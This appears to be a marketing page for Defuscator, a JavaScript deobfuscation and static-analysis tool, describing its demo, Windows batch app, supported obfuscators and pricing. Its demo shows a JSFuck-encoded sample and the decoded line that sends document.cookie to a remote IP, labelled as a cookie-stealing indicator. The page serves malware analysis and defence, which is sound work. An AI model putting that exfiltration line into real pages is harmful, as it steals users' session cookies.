Sample 933cd23bSHA-256 933cd23b749d…7dd1f9Static analysis · never executed

Obfuscated JavaScript, read back as plain code.

Paste a packed, string-array or JSFuck sample. Defuscator undoes the layers without running a single line, then tells you what the code would have done and where it would have sent your data.

Exhibit A · received10,012 bytes
[][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]…
Exhibit B · decodedJSFuck · 1 layer
fetch("https://198.51.100.42/c?d="+document.cookie)
Indicators
198.51.100.42 · https://198.51.100.42/c?d=
Behaviour
Reads cookies, sends them to a remote host
Scores
Obfuscation 85 · capability risk 80
Decode this sample → Paste your own Free for samples up to 64 KB. No account needed.

Windows desktop app

A whole folder of scripts, in one run.

Point the Defuscator Batch Processor at a folder of JavaScript and an output folder. Every .js file is analysed with your API key; the decoded files and a batch-summary.csv land on your disk, in the same folder structure.

  • Includes subfolders, with limits on file count and size
  • Risk, obfuscator family and techniques for every file
  • Cancel at any time; credits used and remaining after each run

Windows 10/11 x64 · portable ZIP, no installer · needs a Defuscator API key

Defuscator Batch Processor
InputD:\samples\incident-0412\
OutputD:\samples\incident-0412-decoded\
FileRiskTechniquesStatus
nested\atob.js38Network endpoint reference, high entropyDone
nested\hex.js24Network endpoint referenceDone
packer.js0P.A.C.K.E.R. layer decodedDone
clean.js0No obfuscation detectedDone
big.js–Larger than the plan's API size limitSkipped
5 files · 4 analysed · 1 skippedSummary: batch-summary.csv

What it takes apart

Measured against the real obfuscators in a public benchmark, including the cases it still fails.

TechniqueResultNotes
obfuscator.io string arraysDecodedRotation, base64 and RC4 encodings, wrappers and proxy functions
Dean Edwards P.A.C.K.E.R.DecodedBase 10 to 62, any parameter names, nested layers
JSFuckDecodedBy modelling the type coercions, not by evaluating the sample
JS-ConfuserStrings decodedVirtual-machine presets are identified and reported, not decoded
Hex, unicode and char-code escapesDecodedIncluding atob, unescape and String.fromCharCode
Inline source mapsRecoveredOriginal files restored from embedded sourcesContent
JJEncode and AAEncodeDetectedFlagged in the report; not decoded yet

Where you can run it

  1. In the browser

    The demo decodes one sample at a time and shows the decoded code, the indicators and both scores. Nothing to install.

    Open the demo
  2. On a whole folder

    The Windows desktop app sends every .js file in a folder to the analyzer with your API key and writes the decoded files and a CSV summary back to disk.

    Get the desktop app
  3. In your pipeline

    The REST API, the command line and the GitHub Action return JSON or SARIF, and the exit code can fail a build on deliberately unreadable code.

    Read the API docs

Start free, pay for volume

The demo is free. Credit packs add the dashboard, API keys, ZIP and desktop batches, and saved reports.

See pricing

Protecting your own code instead?

Defuscator takes obfuscation apart. For the opposite job, JavaScript Obfuscator is a commercial obfuscator for code you publish, with an online tool, desktop app, CLI and build plugins.